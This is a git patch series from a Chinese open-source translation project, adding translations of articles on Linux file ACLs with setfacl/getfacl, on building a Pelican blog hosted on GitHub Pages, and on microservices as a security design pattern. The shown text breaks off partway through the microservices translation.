+group::r-- +other::r-- + +``` + +### 如何为文件设置 ACL + +以下面格式运行 setfacl 命令可以为指定文件设置 ACL。在下面的例子中,我们会给 `magi` 用户对 `/etc/apache2/apache2.conf` 文件 `rwx` 的权限。 +``` +# setfacl -m u:magi:rwx /etc/apache2/apache2.conf + +``` + +**仔细分析起来:** + + * **`setfacl:`** 命令 + * **`-m:`** 修改文件的当前 ACL(s) + * **`u:`** 指明用户 + * **`magi:`** 用户名称 + * **`rwx:`** 想设置的权限 + * **`/etc/apache2/apache2.conf:`** 文件名称 + +再查看一次新的 ACL 值: +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +user:magi:rwx +group::r-- +mask::rwx +other::r-- + +``` + +注意: 若你发现文件或目录权限后面有一个加号 (+),就表示设置了 ACL。 +``` +# ls -lh /etc/apache2/apache2.conf +-rw-rwxr--+ 1 root root 7.1K Sep 19 14:58 /etc/apache2/apache2.conf + +``` + +### 如何为目录设置 ACL + +以下面格式运行 setfacl 命令可以递归第为指定目录设置 ACL。在下面的例子中,我们会将 `/etc/apache2/sites-available/` 目录中的 `rwx` 权限赋予 `magi` 用户。 +``` +# setfacl -Rm u:magi:rwx /etc/apache2/sites-available/ + +``` + +**其中 :** + + * **`-R:`** 递归到子目录中 + + +再次查看一下新的 ACL 值。 +``` +# getfacl /etc/apache2/sites-available/ + +# file: etc/apache2/sites-available/ +# owner: root +# group: root +user::rwx +user:magi:rwx +group::r-x +mask::rwx +other::r-x + +``` + +现在 `/etc/apache2/sites-available/` 中的文件和目录都设置了 ACL。 +``` +# ls -lh /etc/apache2/sites-available/ +total 20K +-rw-rwxr--+ 1 root root 1.4K Sep 19 14:56 000-default.conf +-rw-rwxr--+ 1 root root 6.2K Sep 19 14:56 default-ssl.conf +-rw-rwxr--+ 1 root root 1.4K Dec 8 02:57 mywebpage.com.conf +-rw-rwxr--+ 1 root root 1.4K Dec 7 19:07 testpage.com.conf + +``` + +### 如何为组设置 ACL + +以下面格式为指定文件运行 setfacl 命令。在下面的例子中,我们会给 `appdev` 组赋予 `/etc/apache2/apache2.conf` 文件的 `rwx` 权限。 +``` +# setfacl -m g:appdev:rwx /etc/apache2/apache2.conf + +``` + +**其中:** + + * **`g:`** 指明一个组 + + + +对多个用户和组授权,只需要用 `逗号` 区分开,就像下面这样。 +``` +# setfacl -m u:magi:rwx,g:appdev:rwx /etc/apache2/apache2.conf + +``` + +### 如何删除 ACL + +以下面格式运行 setfacl 命令会删除文件对指定用户的 ACL。这只会删除用户权限而保留 `mask` 的值为只读。 +``` +# setfacl -x u:magi /etc/apache2/apache2.conf + +``` + +**其中:** + + * **`-x:`** 从文件的 ACL(s) 中删除 + + + +再次查看 ACl 值。在下面的输出中我们可以看到 `mask` 的值还是只读。 +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +group::r-- +mask::r-- +other::r-- + +``` + +使用 `-b` 来删除文件中所有的 ACLs。 +``` +# setfacl -b /etc/apache2/apache2.conf + +``` + +**其中:** + + * **`-b:`** 删除所有的 ACL 条目 + + +再次查看删掉后的 ACl 值就会发现所有的东西都不见了,包括 mask 的值也不见了。 +``` +# getfacl /etc/apache2/apache2.conf + +# file: etc/apache2/apache2.conf +# owner: root +# group: root +user::rw- +group::r-- +other::r-- + +``` + +### 如何备份并还原 ACL + +下面命令可以备份和还原 ACL 的值。要制作备份, 需要进入对应的目录然后这样做(假设我们要备份 `sites-available` 目录中的 ACL 值)。 + +``` +# cd /etc/apache2/sites-available/ +# getfacl -R * > acl_backup_for_folder + +``` + +还原的话,则运行下面命令 +``` +# setfacl --restore=/etc/apache2/sites-available/acl_backup_for_folder +``` + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/how-to-configure-access-control-lists-acls-setfacl-getfacl-linux/ + +作者:[Magesh Maruthamuthu;Steven M. Dupuis][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com From 62e4a655a56ebbf827625acce3509b1593d98ae1 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Fri, 15 Dec 2017 22:16:58 +0800 Subject: [PATCH 0597/1627] remove source file --- ...ng a blog with pelican and Github pages.md | 188 ------------------ 1 file changed, 188 deletions(-) delete mode 100644 sources/tech/20171213 Creating a blog with pelican and Github pages.md diff --git a/sources/tech/20171213 Creating a blog with pelican and Github pages.md b/sources/tech/20171213 Creating a blog with pelican and Github pages.md deleted file mode 100644 index f252ae343d..0000000000 --- a/sources/tech/20171213 Creating a blog with pelican and Github pages.md +++ /dev/null @@ -1,188 +0,0 @@ -translating by liuxinyu123 - -Creating a blog with pelican and Github pages -====== - -Today I'm going to talk about how this blog was created. Before we begin, I expect you to be familiarized with using Github and creating a Python virtual enviroment to develop. If you aren't, I recommend you to learn with the [Django Girls tutorial][2], which covers that and more. - -This is a tutorial to help you publish a personal blog hosted by Github. For that, you will need a regular Github user account (instead of a project account). - -The first thing you will do is to create the Github repository where your code will live. If you want your blog to point to only your username (like rsip22.github.io) instead of a subfolder (like rsip22.github.io/blog), you have to create the repository with that full name. - -![Screenshot of Github, the menu to create a new repository is open and a new repo is being created with the name 'rsip22.github.io'][3] - -I recommend that you initialize your repository with a README, with a .gitignore for Python and with a [free software license][4]. If you use a free software license, you still own the code, but you make sure that others will benefit from it, by allowing them to study it, reuse it and, most importantly, keep sharing it. - -Now that the repository is ready, let's clone it to the folder you will be using to store the code in your machine: -``` - $ git clone https://github.com/YOUR_USERNAME/YOUR_USERNAME.github.io.git - -``` - -And change to the new directory: -``` - $ cd YOUR_USERNAME.github.io - -``` - -Because of how Github Pages prefers to work, serving the files from the master branch, you have to put your source code in a new branch, preserving the "master" for the output of the static files generated by Pelican. To do that, you must create a new branch called "source": -``` - $ git checkout -b source - -``` - -Create the virtualenv with the Python3 version installed on your system. - -On GNU/Linux systems, the command might go as: -``` - $ python3 -m venv venv - -``` - -or as -``` - $ virtualenv --python=python3.5 venv - -``` - -And activate it: -``` - $ source venv/bin/activate - -``` - -Inside the virtualenv, you have to install pelican and it's dependencies. You should also install ghp-import (to help us with publishing to github) and Markdown (for writing your posts using markdown). It goes like this: -``` - (venv)$ pip install pelican markdown ghp-import - -``` - -Once that is done, you can start creating your blog using pelican-quickstart: -``` - (venv)$ pelican-quickstart - -``` - -Which will prompt us a series of questions. Before answering them, take a look at my answers below: -``` - > Where do you want to create your new web site? [.] ./ - > What will be the title of this web site? Renata's blog - > Who will be the author of this web site? Renata - > What will be the default language of this web site? [pt] en - > Do you want to specify a URL prefix? e.g., http://example.com (Y/n) n - > Do you want to enable article pagination? (Y/n) y - > How many articles per page do you want? [10] 10 - > What is your time zone? [Europe/Paris] America/Sao_Paulo - > Do you want to generate a Fabfile/Makefile to automate generation and publishing? (Y/n) Y **# PAY ATTENTION TO THIS!** - > Do you want an auto-reload & simpleHTTP script to assist with theme and site development? (Y/n) n - > Do you want to upload your website using FTP? (y/N) n - > Do you want to upload your website using SSH? (y/N) n - > Do you want to upload your website using Dropbox? (y/N) n - > Do you want to upload your website using S3? (y/N) n - > Do you want to upload your website using Rackspace Cloud Files? (y/N) n - > Do you want to upload your website using GitHub Pages? (y/N) y - > Is this your personal page (username.github.io)? (y/N) y - Done. Your new project is available at /home/username/YOUR_USERNAME.github.io - -``` - -About the time zone, it should be specified as TZ Time zone (full list here: [List of tz database time zones][5]). - -Now, go ahead and create your first blog post! You might want to open the project folder on your favorite code editor and find the "content" folder inside it. Then, create a new file, which can be called my-first-post.md (don't worry, this is just for testing, you can change it later). The contents should begin with the metadata which identifies the Title, Date, Category and more from the post before you start with the content, like this: -``` - .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes - Title: My first post - Date: 2017-11-26 10:01 - Modified: 2017-11-27 12:30 - Category: misc - Tags: first , misc - Slug: My-first-post - Authors: Your name - Summary: What does your post talk about ? Write here. - - This is the *first post* from my Pelican blog. ** YAY !** -``` - -Let's see how it looks? - -Go to the terminal, generate the static files and start the server. To do that, use the following command: -``` - (venv)$ make html && make serve -``` - -While this command is running, you should be able to visit it on your favorite web browser by typing localhost:8000 on the address bar. - -![Screenshot of the blog home. It has a header with the title Renata\\'s blog, the first post on the left, info about the post on the right, links and social on the bottom.][6] - -Pretty neat, right? - -Now, what if you want to put an image in a post, how do you do that? Well, first you create a directory inside your content directory, where your posts are. Let's call this directory 'images' for easy reference. Now, you have to tell Pelican to use it. Find the pelicanconf.py, the file where you configure the system, and add a variable that contains the directory with your images: -``` - .lang="python" # DON'T COPY this line, it exists just for highlighting purposes - STATIC_PATHS = ['images'] - -``` - -Save it. Go to your post and add the image this way: -``` - .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes - ![Write here a good description for people who can ' t see the image]({filename}/images/IMAGE_NAME.jpg) - -``` - -You can interrupt the server at anytime pressing CTRL+C on the terminal. But you should start it again and check if the image is correct. Can you remember how? -``` - (venv)$ make html && make serve -``` - -One last step before your coding is "done": you should make sure anyone can read your posts using ATOM or RSS feeds. Find the pelicanconf.py, the file where you configure the system, and edit the part about feed generation: -``` - .lang="python" # DON'T COPY this line, it exists just for highlighting purposes - FEED_ALL_ATOM = 'feeds/all.atom.xml' - FEED_ALL_RSS = 'feeds/all.rss.xml' - AUTHOR_FEED_RSS = 'feeds/%s.rss.xml' - RSS_FEED_SUMMARY_ONLY = False -``` - -Save everything so you can send the code to Github. You can do that by adding all files, committing it with a message ('first commit') and using git push. You will be asked for your Github login and password. -``` - $ git add -A && git commit -a -m 'first commit' && git push --all - -``` - -And... remember how at the very beginning I said you would be preserving the master branch for the output of the static files generated by Pelican? Now it's time for you to generate them: -``` - $ make github - -``` - -You will be asked for your Github login and password again. And... voila! Your new blog should be live on https://YOUR_USERNAME.github.io. - -If you had an error in any step of the way, please reread this tutorial, try and see if you can detect in which part the problem happened, because that is the first step to debbugging. Sometimes, even something simple like a typo or, with Python, a wrong indentation, can give us trouble. Shout out and ask for help online or on your community. - -For tips on how to write your posts using Markdown, you should read the [Daring Fireball Markdown guide][7]. - -To get other themes, I recommend you visit [Pelican Themes][8]. - -This post was adapted from [Adrien Leger's Create a github hosted Pelican blog with a Bootstrap3 theme][9]. I hope it was somewhat useful for you. - --------------------------------------------------------------------------------- - -via: https://rsip22.github.io/blog/create-a-blog-with-pelican-and-github-pages.html - -作者:[][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://rsip22.github.io -[1]https://rsip22.github.io/blog/category/blog.html -[2]https://tutorial.djangogirls.org -[3]https://rsip22.github.io/blog/img/create_github_repository.png -[4]https://www.gnu.org/licenses/license-list.html -[5]https://en.wikipedia.org/wiki/List_of_tz_database_time_zones -[6]https://rsip22.github.io/blog/img/blog_screenshot.png -[7]https://daringfireball.net/projects/markdown/syntax -[8]http://www.pelicanthemes.com/ -[9]https://a-slide.github.io/blog/github-pelican From 7e1e297d6de5ce6ca7188c5e5e7a43f6a643b361 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Fri, 15 Dec 2017 22:30:44 +0800 Subject: [PATCH 0598/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ng a blog with pelican and Github pages.md | 158 ++++++++++++++++++ 1 file changed, 158 insertions(+) create mode 100644 translated/tech/20171213 Creating a blog with pelican and Github pages.md diff --git a/translated/tech/20171213 Creating a blog with pelican and Github pages.md b/translated/tech/20171213 Creating a blog with pelican and Github pages.md new file mode 100644 index 0000000000..bf3b31857f --- /dev/null +++ b/translated/tech/20171213 Creating a blog with pelican and Github pages.md @@ -0,0 +1,158 @@ +使用 pelican 和 Github pages 来搭建博客 +=============================== + +今天我将谈一下这个博客是如何搭建的。在我们开始之前,我希望你熟悉使用 Github 并且可以搭建一个 Python 虚拟环境来进行开发。如果你不能做到这些,我推荐你去学习一下 [Django Girls 教程][2],它包含以上和更多的内容。 +这是一篇帮助你发布由 Github 来托管个人博客的教程。为此,你需要一个正常的 Github 用户账户 (不是一个工程账户)。 +你要做的第一件事是创建一个放置代码的 Github 仓库。如果你想要你的博客仅仅指向你的用户名 (比如 rsip22.github.io) 而不是一个子文件夹 (比如 rsip22.github.io/blog),你必须创建一个带有全名的仓库。 + +![][3] +*Github 截图,打开了创建新仓库的菜单,正在以'rsip22.github.io'名字创建一个新的仓库* + +我推荐你使用 README,Python 版的 .gitignore 和 [一个免费的软件 license][4] 初始化你的仓库。如果你使用一个免费的软件 license,你仍然拥有代码,但是你要确保他人将从中受益,允许他们学习和复用,并且更重要的是允许他们享有代码。 +既然仓库已经创建好了,那我们就克隆到本机中将用来保存代码的文件夹下: +``` +$ git clone https://github.com/YOUR_USERNAME/YOUR_USERNAME.github.io.git +``` +并且切换到新的目录: +``` + $ cd YOUR_USERNAME.github.io +``` +因为 Github Pages 偏好的运行的方式是从 master 分支提供文件,你必须将你的源代码放到新的分支,保护为输出 Pelican 产生的静态文件的"master"分支。为此,你必须创建一个名为"source"的分支。 +``` +$ git checkout -b source +``` +在你的系统中创建一个带有 Pyhton 3 版本的虚拟环境。 +在 GNU/Linux 系统中,命令可能如下: +``` + $ python3 -m venv venv +``` +或者像这样: +``` +$ virtualenv --python=python3.5 venv +``` +并且激活它: +``` + $ source venv/bin/activate +``` +在虚拟环境里,你需要安装 pelican 和它的依赖包。你也应该安装 ghp-import (来帮助我们发布到 Github 上) 和 Markdown (为了使用 markdown 语法来写文章)。它运行如下: +``` +(venv)$ pip install pelican markdown ghp-import +``` +一旦这些完成,你就可以使用 pelican-quickstart 开始创建你的博客了: +``` +(venv)$ pelican-quickstart +``` +这将会提示我们一系列的问题。在回答它们之前,请看一下如下我的答案: +``` + > Where do you want to create your new web site? [.] ./ + > What will be the title of this web site? Renata's blog + > Who will be the author of this web site? Renata + > What will be the default language of this web site? [pt] en + > Do you want to specify a URL prefix? e.g., http://example.com (Y/n) n + > Do you want to enable article pagination? (Y/n) y + > How many articles per page do you want? [10] 10 + > What is your time zone? [Europe/Paris] America/Sao_Paulo + > Do you want to generate a Fabfile/Makefile to automate generation and publishing? (Y/n) Y **# PAY ATTENTION TO THIS!** + > Do you want an auto-reload & simpleHTTP script to assist with theme and site development? (Y/n) n + > Do you want to upload your website using FTP? (y/N) n + > Do you want to upload your website using SSH? (y/N) n + > Do you want to upload your website using Dropbox? (y/N) n + > Do you want to upload your website using S3? (y/N) n + > Do you want to upload your website using Rackspace Cloud Files? (y/N) n + > Do you want to upload your website using GitHub Pages? (y/N) y + > Is this your personal page (username.github.io)? (y/N) y + Done. Your new project is available at /home/username/YOUR_USERNAME.github.io +``` +关于时区,应该指定为 TZ 时区 (这里是全部列表: [tz 数据库时区列表][5])。 +现在,继续往下走并开始创建你的第一篇博文!你可能想在你喜爱的代码编辑器里打开工程目录并且找到里面的"content"文件夹。然后创建一个新文件,它可以被命名为 my-first-post.md (别担心,这只是为了测试,以后你可以改变它)。内容应该以元数据开始,这些元数据标识题目,日期,目录和更多主题之前的文章内容,像下面这样: +``` + .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes + Title: My first post + Date: 2017-11-26 10:01 + Modified: 2017-11-27 12:30 + Category: misc + Tags: first , misc + Slug: My-first-post + Authors: Your name + Summary: What does your post talk about ? Write here. + + This is the *first post* from my Pelican blog. ** YAY !** +``` +让我们看看它长什么样? +进入终端,产生静态文件并且启动服务器。要这么做,使用下面命令: +``` +(venv)$ make html && make serve +``` +当这条命令正在运行,你应该可以在你喜爱的 web 浏览器地址栏中键入 localhost:8000 来访问它。 + +![][6] +*博客主页的截图。它有一个带有 Renata's blog 标题的头部,第一篇博文在左边,文章的信息在右边,链接和社交在底部* + +相当简洁,对吧? +现在,如果你想在文章中放一张图片,该怎么做呢?好,首先你在放置文章的内容目录里创建一个目录。为了引用简单,我们将这个目录命名为'image'。现在你必须让 Pelican 使用它。找到 pelicanconf.py 文件,这个文件是你配置系统的地方,并且添加一个包含你的图片目录的变量: +``` + .lang="python" # DON'T COPY this line, it exists just for highlighting purposes + STATIC_PATHS = ['images'] +``` +保存它。打开文章并且以如下方式添加图片: +``` + .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes + ![Write here a good description for people who can ' t see the image]({filename}/images/IMAGE_NAME.jpg) +``` +你可以在终端中随时按下 CTRL+C 来中断服务器。但是你应该再次启动它并检查图片是否正确。你能记住怎么样做吗? +``` +(venv)$ make html && make serve +``` +在你代码完工之前的最后一步:你应该确保任何人都可以使用 ATOM 或 RSS feeds 来读你的文章。找到 pelicanconf.py 文件,这个文件是你配置系统的地方,并且编辑关于 feed 产生的部分: +``` + .lang="python" # DON'T COPY this line, it exists just for highlighting purposes + FEED_ALL_ATOM = 'feeds/all.atom.xml' + FEED_ALL_RSS = 'feeds/all.rss.xml' + AUTHOR_FEED_RSS = 'feeds/%s.rss.xml' + RSS_FEED_SUMMARY_ONLY = False +``` +保存所有,这样你才可以将代码上传到 Github 上。你可以通过添加所有文件,使用一个信息 ('first commit') 来提交它,并且使用 git push。你将会被问起你的 Github 登录名和密码。 +``` + $ git add -A && git commit -a -m 'first commit' && git push --all +``` +And... remember how at the very beginning I said you would be preserving the master branch for the output of the static files generated by Pelican? Now it's time for you to generate them: +还有...记住在最开始的时候,我给你说的怎样保护为输出 Pelican 产生的静态文件的 master 分支。现在对你来说是时候产生它们了: +``` +$ make github +``` +你将会被再次问及 Github 登录名和密码。好了!你的新博客应该创建在 `https://YOUR_USERNAME.github.io`。 + +如果你在过程中任何一步遇到一个错误,请重新读一下这篇手册,尝试并看看你是否能发现错误发生的部分,因为这是调试的第一步。有时甚至一些简单的东西比如一个错字或者 Python 中错误的缩进都可以给我们带来麻烦。说出来并向网上或你的团队求助。 + +对于如何使用 Markdown 来写文章,你可以读一下 [Daring Fireball Markdown 指南][7]。 + +为了获取其它主题,我建议你访问 [Pelican 主题][8]。 + +这篇文章改编自 [Adrien Leger 的使用一个 Bottstrap3 主题来搭建由 Github 托管的 Pelican 博客][9]。 + +----------------------------------------------------------- + +via: https://rsip22.github.io/blog/create-a-blog-with-pelican-and-github-pages.html + +作者:[rsip22][a] +译者:[liuxinyu123](https://github.com/liuxinyu123) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rsip22.github.io +[1]:https://rsip22.github.io/blog/category/blog.html +[2]:https://tutorial.djangogirls.org +[3]:https://rsip22.github.io/blog/img/create_github_repository.png +[4]:https://www.gnu.org/licenses/license-list.html +[5]:https://en.wikipedia.org/wiki/List_of_tz_database_time_zones +[6]:https://rsip22.github.io/blog/img/blog_screenshot.png +[7]:https://daringfireball.net/projects/markdown/syntax +[8]:http://www.pelicanthemes.com/ +[9]:https://a-slide.github.io/blog/github-pelican + + + + + + From 6901bd5a9b42d146df1af55d49c4daf60b52b268 Mon Sep 17 00:00:00 2001 From: erlinux Date: Fri, 15 Dec 2017 23:21:40 +0800 Subject: [PATCH 0599/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Why microservices are a security issue.md | 118 ------------------ ... Why microservices are a security issue.md | 111 ++++++++++++++++ 2 files changed, 111 insertions(+), 118 deletions(-) delete mode 100644 sources/tech/20171123 Why microservices are a security issue.md create mode 100644 translated/tech/20171123 Why microservices are a security issue.md diff --git a/sources/tech/20171123 Why microservices are a security issue.md b/sources/tech/20171123 Why microservices are a security issue.md deleted file mode 100644 index 0bda05860e..0000000000 --- a/sources/tech/20171123 Why microservices are a security issue.md +++ /dev/null @@ -1,118 +0,0 @@ -**translating by [erlinux](https://github.com/erlinux)** - -Why microservices are a security issue -============================================================ - -### Maybe you don't want to decompose all your legacy applications into microservices, but you might consider starting with your security functions. - -![Why microservices are a security issue](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=3V07Lpko "Why microservices are a security issue") -Image by : Opensource.com - -I struggled with writing the title for this post, and I worry that it comes across as clickbait. If you've come to read this because it looked like clickbait, then sorry.[1][5]I hope you'll stay anyway: there are lots of fascinating[2][6] points and many[3][7]footnotes. What I  _didn't_  mean to suggest is that microservices cause [security][15]problems—though like any component, of course, they can—but that microservices are appropriate objects of interest to those involved with security. I'd go further than that: I think they are an excellent architectural construct for those concerned with security. - -And why is that? Well, for those of us with a [systems security][16] bent, the world is an interesting place at the moment. We're seeing a growth in distributed systems, as bandwidth is cheap and latency low. Add to this the ease of deploying to the cloud, and more architects are beginning to realise that they can break up applications, not just into multiple layers, but also into multiple components within the layer. Load balancers, of course, help with this when the various components in a layer are performing the same job, but the ability to expose different services as small components has led to a growth in the design, implementation, and deployment of  _microservices_ . - -More on Microservices - -* [How to explain microservices to your CEO][1] - -* [Free eBook: Microservices vs. service-oriented architecture][2] - -* [Secured DevOps for microservices][3] - -So, [what exactly is a microservice][23]? I quite like [Wikipedia's definition][24], though it's interesting that security isn't mentioned there.[4][17] One of the points that I like about microservices is that, when well-designed, they conform to the first two points of Peter H. Salus' description of the [Unix philosophy][25]: - -1. Write programs that do one thing and do it well. - -2. Write programs to work together. - -3. Write programs to handle text streams, because that is a universal interface. - -The last of the three is slightly less relevant, because the Unix philosophy is generally used to refer to standalone applications, which often have a command instantiation. It does, however, encapsulate one of the basic requirements of microservices: that they must have well-defined interfaces. - -By "well-defined," I don't just mean a description of any externally accessible APIs' methods, but also of the normal operation of the microservice: inputs and outputs—and, if there are any, side-effects. As I described in a previous post, "[5 traits of good systems architecture][18]," data and entity descriptions are crucial if you're going to be able to design a system. Here, in our description of microservices, we get to see why these are so important, because, for me, the key defining feature of a microservices architecture is decomposability. And if you're going to decompose[5][8] your architecture, you need to be very, very clear which "bits" (components) are going to do what. - -And here's where security starts to come in. A clear description of what a particular component should be doing allows you to: - -* Check your design - -* Ensure that your implementation meets the description - -* Come up with reusable unit tests to check functionality - -* Track mistakes in implementation and correct them - -* Test for unexpected outcomes - -* Monitor for misbehaviour - -* Audit actual behaviour for future scrutiny - -Now, are all these things possible in a larger architecture? Yes, they are. But they become increasingly difficult where entities are chained together or combined in more complex configurations. Ensuring  _correct_  implementation and behaviour is much, much easier when you've got smaller pieces to work together. And deriving complex systems behaviours—and misbehaviours—is much more difficult if you can't be sure that the individual components are doing what they ought to be. - -It doesn't stop here, however. As I've mentioned on many [previous occasions][19], writing good security code is difficult.[7][9] Proving that it does what it should do is even more difficult. There is every reason, therefore, to restrict code that has particular security requirements—password checking, encryption, cryptographic key management, authorisation, etc.—to small, well-defined blocks. You can then do all the things that I've mentioned above to try to make sure it's done correctly. - -And yet there's more. We all know that not everybody is great at writing security-related code. By decomposing your architecture such that all security-sensitive code is restricted to well-defined components, you get the chance to put your best security people on that and restrict the danger that J. Random Coder[8][10] will put something in that bypasses or downgrades a key security control. - -It can also act as an opportunity for learning: It's always good to be able to point to a design/implementation/test/monitoring tuple and say: "That's how it should be done. Hear, read, mark, learn, and inwardly digest.[9][11]" - -Should you go about decomposing all of your legacy applications into microservices? Probably not. But given all the benefits you can accrue, you might consider starting with your security functions. - -* * * - -1Well, a little bit—it's always nice to have readers. - -2I know they are: I wrote them. - -3Probably less fascinating. - -4At the time this article was written. It's entirely possible that I—or one of you—may edit the article to change that. - -5This sounds like a gardening term, which is interesting. Not that I really like gardening, but still.[6][12] - -6Amusingly, I first wrote, "…if you're going to decompose your architect…," which sounds like the strapline for an IT-themed murder film. - -7Regular readers may remember a reference to the excellent film  _The Thick of It_ . - -8Other generic personae exist; please take your pick. - -9Not a cryptographic digest: I don't think that's what the original writers had in mind. - - _This article originally appeared on [Alice, Eve, and Bob—a security blog][13] and is republished with permission._ - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/microservices-are-security-issue - -作者:[Mike Bursell ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/mikecamel -[1]:https://blog.openshift.com/microservices-how-to-explain-them-to-your-ceo/?intcmp=7016000000127cYAAQ&src=microservices_resource_menu1 -[2]:https://www.openshift.com/promotions/microservices.html?intcmp=7016000000127cYAAQ&src=microservices_resource_menu2 -[3]:https://opensource.com/business/16/11/secured-devops-microservices?src=microservices_resource_menu3 -[4]:https://opensource.com/article/17/11/microservices-are-security-issue?rate=GDH4xOWsgYsVnWbjEIoAcT_92b8gum8XmgR6U0T04oM -[5]:https://opensource.com/article/17/11/microservices-are-security-issue#1 -[6]:https://opensource.com/article/17/11/microservices-are-security-issue#2 -[7]:https://opensource.com/article/17/11/microservices-are-security-issue#3 -[8]:https://opensource.com/article/17/11/microservices-are-security-issue#5 -[9]:https://opensource.com/article/17/11/microservices-are-security-issue#7 -[10]:https://opensource.com/article/17/11/microservices-are-security-issue#8 -[11]:https://opensource.com/article/17/11/microservices-are-security-issue#9 -[12]:https://opensource.com/article/17/11/microservices-are-security-issue#6 -[13]:https://aliceevebob.com/2017/10/31/why-microservices-are-a-security-issue/ -[14]:https://opensource.com/user/105961/feed -[15]:https://opensource.com/tags/security -[16]:https://aliceevebob.com/2017/03/14/systems-security-why-it-matters/ -[17]:https://opensource.com/article/17/11/microservices-are-security-issue#4 -[18]:https://opensource.com/article/17/10/systems-architect -[19]:https://opensource.com/users/mikecamel -[20]:https://opensource.com/users/mikecamel -[21]:https://opensource.com/users/mikecamel -[22]:https://opensource.com/article/17/11/microservices-are-security-issue#comments -[23]:https://opensource.com/resources/what-are-microservices -[24]:https://en.wikipedia.org/wiki/Microservices -[25]:https://en.wikipedia.org/wiki/Unix_philosophy diff --git a/translated/tech/20171123 Why microservices are a security issue.md b/translated/tech/20171123 Why microservices are a security issue.md new file mode 100644 index 0000000000..e0a5b3a078 --- /dev/null +++ b/translated/tech/20171123 Why microservices are a security issue.md @@ -0,0 +1,111 @@ +为什么微服务是一个安全问题 +============================================================ + +### 你可能并不想把所有的遗留应用全部分解为微服务,或许你可以考虑开始一段安全之旅。 + +![Why microservices are a security issue](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003601_05_mech_osyearbook20 16_security_cc.png?itok=3V07Lpko) + +Image by : Opensource.com + +我为这篇文章起个标题,使出 “洪荒之力”,也很担心这会遇到 “好奇心点击”。如果你点击它,是因为激起了你的好奇,那么(我)表示抱歉。[1][5] 我是希望你留下来的 [2][6]:这里有有趣的观点以及很多 [3][7] 注解。我不是故意提出微服务会导致安全问题——尽管如同很多组件一样(都有安全问题)。当然,这些微服务是那些涉及安全(人员)的趣向所在,最佳对象。 + +为什么这样说?好(问题),对于我们这些有[系统安全][16] (的人来说),此时这个世界才是一个有趣的地方。我们看到分布式系统的增长,带宽便宜了并且延迟低了。加上 +"轻松上云"(部署到云的便利性在增加),越来越多的架构师们开始意识到应用是可以分解的。他们可以分解应用程序而不只是多个层,并且层内还能分为多个组件。当然均衡负载,对一个层次内的各个组件协同一个任务有帮助。但是增长揭露不同的服务作为小附件已经导致架构的增长,以及实施微服务的部署。 + +更多关于微服务 + +* [如何向你的 CEO 首席执行官 解释微服务][1] + +* [免费电子书:微服务与面向服务的体系架构][2] + +* [为微服务的 DevOps 保驾护航][3] + +所以,[什么是微服务][23]?我同意[维基百科的定义][24],尽管有趣的关于安全性没有提起。[4][17]我喜欢微服务的一点是,精心设计符合 Peter H. Salus 描述的 [UNIX 哲学][25] 的前俩点: + +1. 程序应该只关注一个目标,并尽可能把它做好。 +2. 让程序能够互相协同工作。 +3. 应该让程序处理文本数据流,因为这是一个通用的接口。 + +三者中最后一个小小的不相关,因为 UNIX 哲学 通常被用来指代独立应用,它常有一个命令实例化。但是,它确实包含了微服务的基本要求之一:必须具有定义 "明确" 的接口。 + +明确下,我指的不仅仅是很多外部 API 访问的方法,还有正常的微服务输入输出操作——以及,如果有任何副作用。就像我之前的文章描述的,“[五个特征良好的系统架构][18]”,如果你能设计一个系统,数据和描述主体是至关重要的。这里,在我们的微服务描述上,我们得到查看为什么这些是很重要的。因为对我来说,微服务架构的关键未来定义是可分解性。如果你要分解 [5][8] 你的架构,你必须非常非常非常的清楚 "bits" +组件要做什么。 + +在这里,安全的要来了。准确描述特定组件应该做什么以允许你: + +* 查看您的样图 +* 确保您的实现符合描述 +* 提出可重用测试单元来审查功能 +* 跟踪实施中的错误并纠正错误 +* 测试意料外的产出 +* 监视不当行为 +* 审核未来可能的真实行为 + +现在,这些东西(微服务)可能都在一个大架构里了吗?是的。但如果实体是在更复杂的配置中链接或组合在一起,他们会随着越来越难。为确保正确的实施和贯彻,当你有小块一起工作。以及如果你不能确定单个组件正在做他们应正在工作的,那么衍生出复杂系统运行状况和不正确行为就困难的多了。 + +不管怎样,它不止于此。由于我已经在许多[以往场合][19]提过,写足够安全的代码是困难的,[7][9] 证实它应该做的更加困难。因此,有理由限制特定安全要求的代码——密码检测、加密、加密密钥管理、授权、等等。——变的小,明确的快。然后你可以执行上面提到所有事情,以确定正确完成。 + 